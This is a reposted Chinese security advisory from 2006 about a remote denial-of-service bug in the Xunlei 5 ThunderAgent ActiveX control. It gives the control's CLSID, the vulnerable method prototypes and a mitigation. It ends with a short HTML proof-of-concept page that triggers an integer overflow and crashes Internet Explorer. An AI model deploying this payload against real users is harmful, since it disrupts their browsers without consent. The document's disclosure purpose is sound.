[转载]迅雷5 ThunderAgent Module 远程拒绝服务漏洞

信息来源：sebug.net
系统编号:BES2006121077
发布时间:2006-12-31
危害级别:★★★★★★
影响版本:
迅雷5.5.2.252(已测试)，
迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)
其他版本可能也受影响
详细说明:
迅雷是由Thunder Networking公司开发的一个下载软件，在中国有着非常广泛的用户。迅雷5的ThunderAgent_005.dll中注册了一个

activex控件，当Internet Explorer调用他的某些方法时，将会造成整数溢出，成功利用将造成Internet Explorer崩溃。
在ThunderAgent_005.dll中，有两处方法调用时忽略了输入参数异常的情况，当输入参数为精心构造的负数或大整数时，将造成整数溢出，产生不可预料的结果，从而造成浏览器崩溃。

该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}
Method原型如下：

[id(0x00000006), helpstring("method GetInfoStruct")]
void GetInfoStruct([in] int pInfo);


[id(0x00000007), helpstring("method GetTaskInfoStruct")]
void GetTaskInfoStruct([in] int pTaskInfo);
参考:
axis(axis@ph4nt0m.org)
http://www.ph4nt0m.org
解决方案:
禁止ie执行activex
厂商补丁：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.xunlei.com
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

POC:
----------------------------------------------------------------------------------------
<html>
<head>

<script>
function AxisFun()
{

evil.GetTaskInfoStruct(0x7fffffff);

}
</script>
</head>

<OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"></OBJECT>

<script>javascript:AxisFun();</script>

</html>